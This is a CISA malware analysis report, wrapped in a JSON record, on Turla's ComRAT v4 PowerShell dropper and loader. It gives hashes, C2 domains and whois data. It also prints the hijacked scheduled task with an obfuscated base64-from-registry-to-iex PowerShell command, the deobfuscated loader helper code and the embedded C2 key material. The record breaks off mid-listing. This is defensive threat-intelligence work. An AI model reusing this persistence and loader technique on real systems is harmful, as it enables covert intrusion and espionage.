{ "id": "a7368b79-d403-4221-9a41-8da335978d82", "created_at": "2026-04-06T02:12:08.642697Z", "updated_at": "2026-04-10T03:33:35.645602Z", "deleted_at": null, "sha1_hash": "04f4526e7cb4d730d6539bf06453471f448d7063", "title": "MAR-10310246-2.v1 – PowerShell Script: ComRAT | CISA", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 93180, "plain_text": "MAR-10310246-2.v1 – PowerShell Script: ComRAT | CISA\r\nPublished: 2020-10-29 · Archived: 2026-04-06 02:03:39 UTC\r\nNotification\r\nThis report is provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not\r\nprovide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial\r\nproduct or service referenced in this bulletin or otherwise.\r\nThis document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries\r\nminimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to\r\nstandard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the\r\nTraffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.\r\nSummary\r\nDescription\r\nThis Malware Analysis Report (MAR) is the result of analytic efforts between the Cybersecurity and Infrastructure Security\r\nAgency (CISA), the Cyber National Mission Force (CNMF), and the Federal Bureau of Investigation (FBI). The malware\r\nvariant, known as ComRAT, has been used by Turla, a Russian-sponsored Advanced Persistent Threat (APT) actor. CISA,\r\nCNMF, and FBI are distributing this MAR to enable network defense and reduced exposure to malicious activity. This MAR\r\nincludes suggested response actions and recommended mitigation techniques.\r\nFBI has high-confidence that Russian-sponsored APT actor Turla, which is an espionage group active for at least a decade, is\r\nusing ComRAT malware to exploit victim networks. The group is well known for its custom tools and targeted operations.\r\nThis report analyzes a PowerShell script that installs a PowerShell script, which will decode and load a 64-bit dynamic-link\r\nlibrary (DLL) identified as ComRAT version 4. This new variant of ComRAT contains embedded 32-bit and 64-bit DLLs\r\nused as communication modules. The communication module (32-bit or 64-bit DLL) is injected into the victim systemís\r\ndefault browser. The ComRATv4 file and the communication module communicate with each other using a named pipe. The\r\nnamed pipe is used to send Hypertext Transfer Protocol (HTTP) requests and receive HTTP responses to and from the\r\ncommunication module for backdoor commands. It is designed to use a Gmail web interface to receive commands and\r\nexfiltrate data. The ComRAT v4 file contains a Virtual File System (VFS) in File Allocation Table 16 (FAT16) format, which\r\nincludes the configuration and logs files.\r\nUsers or administrators should flag activity associated with the malware and report the activity to the CISA or the FBI Cyber\r\nWatch (CyWatch), and give the activity the highest priority for enhanced mitigation. For more information on malicious\r\ncyber activity, please visit https://us-cert.cisa.gov/\r\nFor a downloadable copy of IOCs, see: MAR-10310246-2.v1.WHITE.stix.\r\nSubmitted Files (5)\r\n00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d (Communication_module_32.dll)\r\n134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8 (corrected.ps1)\r\n166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405 (Communication_module_64.dll)\r\n44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316 (ComRATv4.exe)\r\na3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642 (Decode_PowerShell.ps1)\r\nDomains (6)\r\nbranter.tk\r\nbronerg.tk\r\ncrusider.tk\r\nduke6.tk\r\nsanitar.ml\r\nwekanda.tk\r\nhttps://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a\r\nPage 1 of 15\n\nFindings\r\n134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8\r\nTags\r\ndropper\r\nDetails\r\nName corrected.ps1\r\nSize 4345430 bytes\r\nType Little-endian UTF-16 Unicode text, with very long lines, with CRLF, LF line terminators\r\nMD5 65419948186842f8f3ef07cafb71f59a\r\nSHA1 93537b0814177e2101663306aa17332b9303e08a\r\nSHA256 134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8\r\nSHA512 83d093c6febacb11fcde57fee98c2385f628e5cd3629bfabd0f9e4d2c5de18c6336b3d3aff8081b06a827e742876d19ae370e81890c247daac73d4\r\nssdeep 24576:+vq2EYNg0gX792UHDoSe9Ov2a8p+JnHZUoWYWUpcfm3WuPhu/aqJOFKs4Wuw054o:Drr9q0v4ubJmg4OFuwkOM5NZihxs\r\nEntropy 4.004402\r\nAntivirus\r\nNo matches found.\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nRelationships\r\n1349191514... Contains a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642\r\nDescription\r\nThis file is a heavily encoded malicious PowerShell script. It is designed to install a malicious PowerShell script into a\r\nregistry on the victim system. This malicious script also modifies the following scheduled task on the victim's system:\r\n—Begin Modified Scheduled Task—\r\nC:\\Windows\\System32\\Tasks\\Microsoft\\Windows\\Customer Experience Improvement Program\\Consolidator\r\n—End Modified Scheduled Task—\r\nThe modification of this scheduled task causes the installed malicious PowerShell script to be executed. Displayed below is\r\nthe original scheduled task:\r\n—Begin Original Scheduled Task—\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-16\"?\u003e\r\n\u003cTask xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\"\u003e\r\n\u003cRegistrationInfo\u003e\r\n   \u003cVersion\u003e1.0\u003c/Version\u003e\r\n   \u003cSecurityDescriptor\u003eD:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)\u003c/SecurityDescriptor\u003e\r\n   \u003cSource\u003e$(@%systemRoot%\\system32\\wsqmcons.exe,-106)\u003c/Source\u003e\r\n   \u003cAuthor\u003e$(@%systemRoot%\\system32\\wsqmcons.exe,-108)\u003c/Author\u003e\r\n   \u003cDescription\u003e$(@%systemRoot%\\system32\\wsqmcons.exe,-107)\u003c/Description\u003e\r\n   \u003cURI\u003e\\Microsoft\\Windows\\Customer Experience Improvement Program\\Consolidator\u003c/URI\u003e\r\n\u003c/RegistrationInfo\u003e\r\n\u003cPrincipals\u003e\r\n   \u003cPrincipal id=\"WinSQMAccount\"\u003e\r\n    \u003cUserId\u003eS-1-5-18\u003c/UserId\u003e\r\nhttps://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a\r\nPage 2 of 15\n\n\u003c/Principal\u003e\r\n\u003c/Principals\u003e\r\n\u003cSettings\u003e\r\n   \u003cDisallowStartIfOnBatteries\u003efalse\u003c/DisallowStartIfOnBatteries\u003e\r\n   \u003cStopIfGoingOnBatteries\u003efalse\u003c/StopIfGoingOnBatteries\u003e\r\n   \u003cMultipleInstancesPolicy\u003eIgnoreNew\u003c/MultipleInstancesPolicy\u003e\r\n   \u003cStartWhenAvailable\u003etrue\u003c/StartWhenAvailable\u003e\r\n   \u003cIdleSettings\u003e\r\n    \u003cStopOnIdleEnd\u003etrue\u003c/StopOnIdleEnd\u003e\r\n    \u003cRestartOnIdle\u003efalse\u003c/RestartOnIdle\u003e\r\n   \u003c/IdleSettings\u003e\r\n   \u003cUseUnifiedSchedulingEngine\u003etrue\u003c/UseUnifiedSchedulingEngine\u003e\r\n\u003c/Settings\u003e\r\n\u003cTriggers\u003e\r\n   \u003cTimeTrigger\u003e\r\n    \u003cStartBoundary\u003e2004-01-02T00:00:00\u003c/StartBoundary\u003e\r\n    \u003cRepetition\u003e\r\n       \u003cInterval\u003ePT6H\u003c/Interval\u003e\r\n    \u003c/Repetition\u003e\r\n   \u003c/TimeTrigger\u003e\r\n\u003c/Triggers\u003e\r\n\u003cActions Context=\"WinSQMAccount\"\u003e\r\n   \u003cExec\u003e\r\n    \u003cCommand\u003e%SystemRoot%\\System32\\wsqmcons.exe\u003c/Command\u003e\r\n   \u003c/Exec\u003e\r\n\u003c/Actions\u003e\r\n\u003c/Task\u003e\r\n—End Original Scheduled Task—\r\nThe scheduled task is then modified by this malicious PowerShell script. Displayed below is the modified scheduled task:\r\n—Begin Modified Scheduled Task—\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-16\"?\u003e\r\n\u003cTask version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\"\u003e\r\n\u003cRegistrationInfo\u003e\r\n   \u003cSource\u003e$(@%systemRoot%\\system32\\wsqmcons.exe,-106)\u003c/Source\u003e\r\n   \u003cAuthor\u003e$(@%systemRoot%\\system32\\wsqmcons.exe,-108)\u003c/Author\u003e\r\n   \u003cVersion\u003e1.0\u003c/Version\u003e\r\n   \u003cDescription\u003e$(@%systemRoot%\\system32\\wsqmcons.exe,-107)\u003c/Description\u003e\r\n   \u003cURI\u003e\\Microsoft\\Windows\\Customer Experience Improvement Program\\Consolidator\u003c/URI\u003e\r\n   \u003cSecurityDescriptor\u003eD:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)\u003c/SecurityDescriptor\u003e\r\n\u003c/RegistrationInfo\u003e\r\n\u003cTriggers\u003e\r\n   \u003cTimeTrigger\u003e\r\n    \u003cRepetition\u003e\r\n       \u003cInterval\u003ePT6H\u003c/Interval\u003e\r\n       \u003cStopAtDurationEnd\u003efalse\u003c/StopAtDurationEnd\u003e\r\n    \u003c/Repetition\u003e\r\n    \u003cStartBoundary\u003e2004-01-02T00:00:00\u003c/StartBoundary\u003e\r\n    \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n   \u003c/TimeTrigger\u003e\r\n   \u003cLogonTrigger\u003e\r\n    \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n   \u003c/LogonTrigger\u003e\r\n\u003c/Triggers\u003e\r\n\u003cPrincipals\u003e\r\n   \u003cPrincipal id=\"WinSQMAccount\"\u003e\r\n    \u003cRunLevel\u003eLeastPrivilege\u003c/RunLevel\u003e\r\n    \u003cUserId\u003eSYSTEM\u003c/UserId\u003e\r\n   \u003c/Principal\u003e\r\n\u003c/Principals\u003e\r\n\u003cSettings\u003e\r\n   \u003cMultipleInstancesPolicy\u003eIgnoreNew\u003c/MultipleInstancesPolicy\u003e\r\n   \u003cDisallowStartIfOnBatteries\u003efalse\u003c/DisallowStartIfOnBatteries\u003e\r\nhttps://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a\r\nPage 3 of 15\n\n\u003cStopIfGoingOnBatteries\u003efalse\u003c/StopIfGoingOnBatteries\u003e\r\n   \u003cAllowHardTerminate\u003etrue\u003c/AllowHardTerminate\u003e\r\n   \u003cStartWhenAvailable\u003etrue\u003c/StartWhenAvailable\u003e\r\n   \u003cRunOnlyIfNetworkAvailable\u003efalse\u003c/RunOnlyIfNetworkAvailable\u003e\r\n   \u003cIdleSettings\u003e\r\n    \u003cStopOnIdleEnd\u003etrue\u003c/StopOnIdleEnd\u003e\r\n    \u003cRestartOnIdle\u003efalse\u003c/RestartOnIdle\u003e\r\n   \u003c/IdleSettings\u003e\r\n   \u003cAllowStartOnDemand\u003etrue\u003c/AllowStartOnDemand\u003e\r\n   \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n   \u003cHidden\u003efalse\u003c/Hidden\u003e\r\n   \u003cRunOnlyIfIdle\u003efalse\u003c/RunOnlyIfIdle\u003e\r\n   \u003cDisallowStartOnRemoteAppSession\u003efalse\u003c/DisallowStartOnRemoteAppSession\u003e\r\n   \u003cUseUnifiedSchedulingEngine\u003etrue\u003c/UseUnifiedSchedulingEngine\u003e\r\n   \u003cWakeToRun\u003efalse\u003c/WakeToRun\u003e\r\n   \u003cExecutionTimeLimit\u003ePT72H\u003c/ExecutionTimeLimit\u003e\r\n   \u003cPriority\u003e7\u003c/Priority\u003e\r\n\u003c/Settings\u003e\r\n\u003cActions Context=\"WinSQMAccount\"\u003e\r\n   \u003cExec\u003e\r\n    \u003cCommand\u003ecmd.exe\u003c/Command\u003e\r\n    \u003cArguments\u003e/c \"%SystemRoot%\\System32\\wsqmcons.exe \u0026amp; PowerShell.exe -v 2 \"$GS459ea =\r\n'KVYYOBBA4331110uhyicnoor';\r\n[Text.Encoding]::ASCII.GetString([Convert]::\\\"Fr`omBa`se6`4Str`ing\\\"((gp\r\nHKLM:\\SOFTWARE\\Microsoft\\SQMClient\\Windows).WSqmCons))|iex;\r\n\"\"\u003c/Arguments\u003e\r\n   \u003c/Exec\u003e\r\n\u003c/Actions\u003e\r\n\u003c/Task\u003e\r\n—End Modified Scheduled Task—\r\n   The modification of the scheduled task illustrated below indicates the primary purpose of this task modification is to\r\ndecode and execute a PowerShell script contained within the registry key\r\nHKLM:\\SOFTWARE\\Microsoft\\SQMClient\\Windows = WSqmCons:\r\n—Begin Specific Scheduled Task Module—\r\n\u003cActions Context=\"WinSQMAccount\"\u003e\r\n   \u003cExec\u003e\r\n    \u003cCommand\u003ecmd.exe\u003c/Command\u003e\r\n    \u003cArguments\u003e/c \"%SystemRoot%\\System32\\wsqmcons.exe \u0026amp; PowerShell.exe -v 2 \"$GS459ea =\r\n'KVYYOBBA4331110uhyicnoor';\r\n[Text.Encoding]::ASCII.GetString([Convert]::\\\"Fr`omBa`se6`4Str`ing\\\"((gp\r\nHKLM:\\SOFTWARE\\Microsoft\\SQMClient\\Windows).WSqmCons))|iex;\r\n\"\"\u003c/Arguments\u003e\r\n—End Specific Scheduled Task Module—\r\nThis malicious script installs a PowerShell script\r\n(a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642) into the “WsqmCons” registry key. The\r\nprimary purpose of the newly installed PowerShell is to decode and load a malicious DLL, identified as ComRat v4\r\n(44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316) onto the victim's system.\r\na3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642\r\nTags\r\ntrojan\r\nDetails\r\nName Decode_PowerShell.ps1\r\nSize 1264496 bytes\r\nType ASCII text, with very long lines, with CRLF, LF line terminators\r\nMD5 0fd79f4c60593f6aae69ff22086c3bb0\r\nhttps://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a\r\nPage 4 of 15\n\nSHA1 07f0692c856703d75a9946a0fbb3c0db03f7ac40\r\nSHA256 a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642\r\nSHA512 28a0ae0a779aa88499f70cf97ef9db9482527017ea76ee2e469e4184684c4d4fb0559e50f1721e7e9d02655bee4cdf7b12c62a3d037ea10130121\r\nssdeep 24576:jarQlVyeHtWdf7PyJjwLKWp57+7fb0TLaB7VrE:jD567vs1tm\r\nEntropy 6.091278\r\nAntivirus\r\nAntiy GrayWare/PowerShell.Mimikatz.a\r\nClamAV Win.Trojan.PSempireInj-7013548-0\r\nMicrosoft Security Essentials Trojan:PowerShell/Powersploit.J\r\nNANOAV Trojan.Script.ExpKit.eydujq\r\nSymantec Hacktool.Mimikatz\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nRelationships\r\na3170c32c0... Contained_Within 134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8\r\na3170c32c0... Dropped 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316\r\nDescription\r\nThis heavily encoded PowerShell script is installed by the malicious script “corrected.ps1”\r\n(134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8). It is designed to decode and load an\r\nembedded DLL which has been identified as a variant of the malware known as ComRat v4 “ComRATv4.exe\r\n(44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316).\r\nRemoval of some of the PowerShell obfuscation reveals the functions illustrated below. These functions are used to\r\ndecompress the embedded DLL, before it is loaded on the target system:\r\n—Begin PowerShell Helper Functions—\r\n   using System;\r\n   using System.IO;\r\n   using System.IO.Compression;\r\n   public static class CD475bjf{\r\n       public static void DBQ800fc(Stream input, Stream output){byte[] buffer = new byte[16 * 1024];\r\n       int bytesRead;\r\n       while((bytesRead = input.Read(buffer, 0, buffer.Length)) \u003e 0){\r\n           output.Write(buffer, 0, bytesRead);\r\n       }}}\r\n      public static class MAE38aee{\r\n          public static byte[] JZ653jdh(byte[] arrayToCompress){\r\n           using (MemoryStream outStream = new MemoryStream()){using (GZipStream tinyStream = new\r\nGZipStream(outStream, CompressionMode.Compress))using (MemoryStream mStream = new\r\nMemoryStream(arrayToCompress))CD475bjf.DBQ800fc(mStream, tinyStream);\r\n       return outStream.ToArray();\r\n   }}\r\n          public static byte[] PGN255ij(byte[] arrayToDecompress){        \r\n           using (MemoryStream inStream = new MemoryStream(arrayToDecompress))using (GZipStream bigStream = new\r\nGZipStream(inStream, CompressionMode.Decompress))using (MemoryStream bigStreamOut = new MemoryStream())\r\nhttps://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a\r\nPage 5 of 15\n\n{CD475bjf.DBQ800fc(bigStream, bigStreamOut);\r\n       return bigStreamOut.ToArray();\r\n   }}}\r\n#decode base64 above\r\n$decompress = [Convert]::FromBase64String($decompressbase64);\r\n#create another text object for use later\r\n$NS70gea = New-Object System.Text.ASCIIEncoding;\r\n#convert base64 decoded value to string\r\n$decompress = $NS70gea.GetString($decompress,0,$decompress.Length);\r\n—End PowerShell Helper Functions—\r\nFigure 1 illustrates a part of the payload embedded within this malicious script. The encoded PowerShell script contains an\r\nembedded function named “Run”, that can load a DLL directly from memory and inject it into a remote process (Figure 2).\r\nThe PowerShell script injects the embedded ComRAT DLL\r\n(44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316) into the Windows Explorer process.\r\nScreenshots\r\nFigure 1 - Screenshot of the payload embedded within this malicious script.\r\nFigure 2 - Screenshot of the function used to load a DLL directly from memory and inject it into a remote process.\r\n44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316\r\nTags\r\ntrojan\r\nDetails\r\nName ComRATv4.exe\r\nSize 1827840 bytes\r\nType PE32+ executable (DLL) (GUI) x86-64, for MS Windows\r\nMD5 faaafa3e115033ba5115ed6a6ba59ba9\r\nSHA1 ca16a95cd38707bad2dc524bb3086b3c0cb3e372\r\nSHA256 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316\r\nSHA512 6f2fe02c1e15be2409f89ff1e6ae3c78f87e242ee448fe5ff6d375a74f10c7c6cc01f3f6d796aa34599a891e03c5d421d10f0c041e5a6dc0e346aea3\r\nssdeep 49152:jTRjrgdOU9p1PZH/JNTFTJT5dwIwzQJH:PRCBNTBwAH\r\nEntropy 6.463931\r\nAntivirus\r\nAhnlab Trojan/Win64.Turla\r\nESET a variant of Win64/Turla.BX trojan\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2018-03-06 09:38:38-05:00\r\nImport Hash d9d661a606c9d1c23b47672d1067de68\r\nhttps://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a\r\nPage 6 of 15\n\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n11525199e6e248e88e0529cf72a9002d header 1024 2.934959\r\n0f3258519a92690d14406e141dcb285b .text 1027584 6.441800\r\nfa4840dc4653443d4574486df39bc6a3 .rdata 481280 4.896843\r\nca22c78d526550925d7843a24cd1d266 .data 264704 7.368343\r\nf7cc8fa49cfa87a125d8354082e162f3 .pdata 47104 6.030652\r\nef6fdd7440f36ba21373b4585a5c83e4 .rsrc 512 4.724729\r\n4f16258cf938a4bc7fe0ae92121f442d .reloc 5632 5.425381\r\nRelationships\r\n44d6d67b53... Contains 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d\r\n44d6d67b53... Contains 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405\r\n44d6d67b53... Dropped_By a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642\r\nDescription\r\nThis application is a 32-bit Windows DLL that has been identified as a module of ComRAT v4. The DLL is loaded into\r\nWindows Explorer (Explorer.exe) by a ComRAT PowerShell loader\r\n(a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642). When executed, it checks the victim's\r\nsystem day\\time and it performs code execution between 9AM to 5PM Monday through Friday. During execution, it installs\r\nthe following files into the %TEMP% folder:\r\n--Begin files--\r\n\"%TEMP%\\iecache.bin\" ==\u003e an AES-256-XTS encrypted VFS FAT16 format, containing the malware configuration and\r\nthe logs files. (The encryption key is generated during runtime and stored in the Windows registry).\r\n\"%TEMP%\\FSAPIDebugLogFile.txt\r\n--End files--\r\nThe malware injects an embedded communication module\r\n(00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d or\r\n(166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405) into the victim system's default browser and\r\nexecutes it. This file and the communication module communicate with each other using a named pipe. The malware uses\r\nthe named pipe to send HTTP requests and receive HTTP responses to and from the communication module for backdoor\r\ncommands. It is designed to use the Gmail web interface to receive commands and exfiltrate data.\r\nIllustrated below are sample data observed in the decrypted VFS in FAT16 format. Some of these files can be updated in the\r\nVFS using backdoor commands.\r\n--Begin sample data in the VFS --\r\n\"/etc/pal/\" contains a list of C2 domains: \"bronerg.tk|crusider.tk|duke6.tk\"\r\n\"/etc/gal.bin\" contains a list of C2 domains: \"sanitar.ml|wekanda.tk|branter.tk\"\r\n\"/etc/pki/aes_key.pki\" : Contains the Advanced Encryption Standard (AES) encryption keys for the C2 communications:\r\n--Begin AES key--\r\n4F8112E9E5AB5391C584D567B58E539F0400094A83EA0C2DDC7FA455FCF447B1\r\n--End AES key--\r\n\"/etc/pki/public_cert.pki\" contains the Rivest–Shamir–Adleman (RSA) encryption key used for the C2 communications:\r\n--Begin RSA key--\r\nBE51E00093CEB0A5FCAE59EB4EEEB3079D1CB17FC195321587CB513003826917B0BC13EB3B9A4209A4FFAF19C07249D360F447A6FAE3936\r\n--End RSA key--\r\nIt uses the public key cryptography with RSA and AES encrypted email attachments for its Gmail C2 channel.\r\n\"/etc/mail/subj_dict\" contains the the Subject \"Re: |RE: |FW: |FWD: | Fw: | Fwd:| FYI: |FYIP |NRN: | NT: | N/T | n/t| NB\r\n|NM| n/m |N/M: |*n/m*\"\r\n\"/etc/php_storage/GET/DEF/server.txt \" and \"/etc/php_storage/POST/DEF/server.txt\" contains server IP \"172.22.150.125\".\r\n--End sample data in the VFS --\r\nhttps://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a\r\nPage 7 of 15\n\nScreenshots\r\nFigure 3 - The first bytes of the decrypted VFS in FAT16 format.\r\nFigure 4 - The decrypted VFS hierarchy, containing the malware configuration and the logs files.\r\n00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d\r\nTags\r\nbackdoordownloaderloadertrojan\r\nDetails\r\nName Communication_module_32.dll\r\nSize 61440 bytes\r\nType PE32 executable (DLL) (GUI) Intel 80386, for MS Windows\r\nMD5 e509c3a40045d2dab9404240f3f201ed\r\nSHA1 86f747cac3b16ed2dab6d9f72a347145ff7a850d\r\nSHA256 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d\r\nSHA512 f78827b6fc258f4a63dd17fec2acb7114329a9d7fd426c72838f2e5e5c54c12fce7be7a0eb9c7e7e74b01fe80c42293ef89c3bcbafd230a68f9639e\r\nssdeep 1536:zlAjaBOUFoD0C8YQ7aZS7C2kkAxWzg39xa3cdjrH++:zl2uOUG0CBQ7aZS7C3uzg39xEM\r\nEntropy 5.338807\r\nAntivirus\r\nAntiy Trojan[Backdoor]/Win32.Turla\r\nAvira TR/Crypt.XPACK.Gen3\r\nESET a variant of Win32/Turla.EO trojan\r\nIkarus Trojan-Downloader.Win32.Farfli\r\nNANOAV Trojan.Win32.Turla.hlrzcr\r\nSymantec Heur.AdvML.B\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2018-03-06 09:36:54-05:00\r\nImport Hash 87ab41c57e95562a3e81f0609398b278\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\nb9bd1636e8c11ff1ab2368771e89cfac header 4096 0.612975\r\n077bf2412ba289da7b6261ffec65988d .text 49152 6.051754\r\n1c95870051ff12b740487ff93d19ef3b .rdata 4096 0.317233\r\nb86e403ac8c58a013fe4cda6b6715804 .reloc 4096 0.019202\r\nRelationships\r\nhttps://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a\r\nPage 8 of 15\n\n00352afc7e... Contained_Within 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316\r\n00352afc7e... Connected_To branter.tk\r\n00352afc7e... Connected_To wekanda.tk\r\n00352afc7e... Connected_To sanitar.ml\r\n00352afc7e... Connected_To duke6.tk\r\n00352afc7e... Connected_To bronerg.tk\r\n00352afc7e... Connected_To crusider.tk\r\nDescription\r\nThis application is a 32-bit Windows DLL that has been identified as the communication module injected into the victim's\r\nsystem default browser by \"ComRATv4.exe\"\r\n(44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316). It is designed to use the HTTP and a Gmail\r\nweb interface for the C2. It attempts to connect to its C2 using secure connections.\r\n--Begin list of domains--\r\nbronerg.tk\r\ncrusider.tk\r\nduke6.tk\r\nsanitar.ml\r\nwekanda.tk\r\nbranter.tk\r\n--End list of domains--\r\nDisplayed below is sample request header:\r\n--Begin header--\r\nCONNECT bronerg[.]tk:443 HTTP/1.0\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2;\r\n.NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\r\nHost: bronerg.tk:443\r\nContent-Length: 0\r\nConnection: Keep-Alive\r\n--End header--\r\nbronerg.tk\r\nTags\r\ncommand-and-control\r\nWhois\r\nDomain name:\r\n    BRONERG.TK\r\nOrganisation:\r\n    Freedom Registry, Inc.\r\n    2225 East Bayshore Road #290\r\n    Palo Alto CA 94303\r\n    United States\r\n    Phone: +1 650-681-4172\r\n    Fax: +1 650-681-4173\r\nDomain Nameservers:\r\n    NS01.FREENOM.COM\r\n    NS02.FREENOM.COM\r\n    NS03.FREENOM.COM\r\n    NS04.FREENOM.COM\r\nRelationships\r\nbronerg.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405\r\nhttps://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a\r\nPage 9 of 15\n\nbronerg.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d\r\nDescription\r\nComRAT v4 C2 domain.\r\ncrusider.tk\r\nTags\r\ncommand-and-control\r\nPorts\r\n443 TCP\r\nWhois\r\nDomain name:\r\n    CRUSIDER.TK\r\nOrganisation:\r\n    Freedom Registry, Inc.\r\n    2225 East Bayshore Road #290\r\n    Palo Alto CA 94303\r\n    United States\r\n    Phone: +1 650-681-4172\r\n    Fax: +1 650-681-4173\r\nDomain Nameservers:\r\n    NS01.FREENOM.COM\r\n    NS02.FREENOM.COM\r\n    NS03.FREENOM.COM\r\n    NS04.FREENOM.COM\r\nRelationships\r\ncrusider.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405\r\ncrusider.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d\r\nDescription\r\nComRAT v4 C2 domain.\r\nduke6.tk\r\nTags\r\ncommand-and-control\r\nWhois\r\nDomain name:\r\n    DUKE6.TK\r\nOrganisation:\r\n    Freedom Registry, Inc.\r\n    2225 East Bayshore Road #290\r\n    Palo Alto CA 94303\r\n    United States\r\n    Phone: +1 650-681-4172\r\n    Fax: +1 650-681-4173\r\nDomain Nameservers:\r\n    NS01.FREENOM.COM\r\n    NS02.FREENOM.COM\r\nhttps://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a\r\nPage 10 of 15\n\nNS03.FREENOM.COM\r\n    NS04.FREENOM.COM\r\nRelationships\r\nduke6.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d\r\nduke6.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405\r\nDescription\r\nComRAT v4 C2 domain.\r\nsanitar.ml\r\nTags\r\ncommand-and-control\r\nWhois\r\nDomain name:\r\n    SANITAR.ML\r\nOrganisation:\r\n    Freedom Registry, Inc.\r\n    2225 East Bayshore Road #290\r\n    Palo Alto CA 94303\r\n    United States\r\n    Phone: +1 650-681-4172\r\n    Fax: +1 650-681-4173\r\nDomain Nameservers:\r\n    NS01.FREENOM.COM\r\n    NS02.FREENOM.COM\r\n    NS03.FREENOM.COM\r\n    NS04.FREENOM.COM\r\nRelationships\r\nsanitar.ml Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d\r\nsanitar.ml Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405\r\nDescription\r\nComRAT v4 C2 domain.\r\nwekanda.tk\r\nTags\r\ncommand-and-control\r\nWhois\r\nDomain name:\r\n    WEKANDA.TK\r\nOrganisation:\r\n    Freedom Registry, Inc.\r\n    2225 East Bayshore Road #290\r\n    Palo Alto CA 94303\r\n    United States\r\n    Phone: +1 650-681-4172\r\n    Fax: +1 650-681-4173\r\nhttps://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a\r\nPage 11 of 15\n\nDomain Nameservers:\r\n    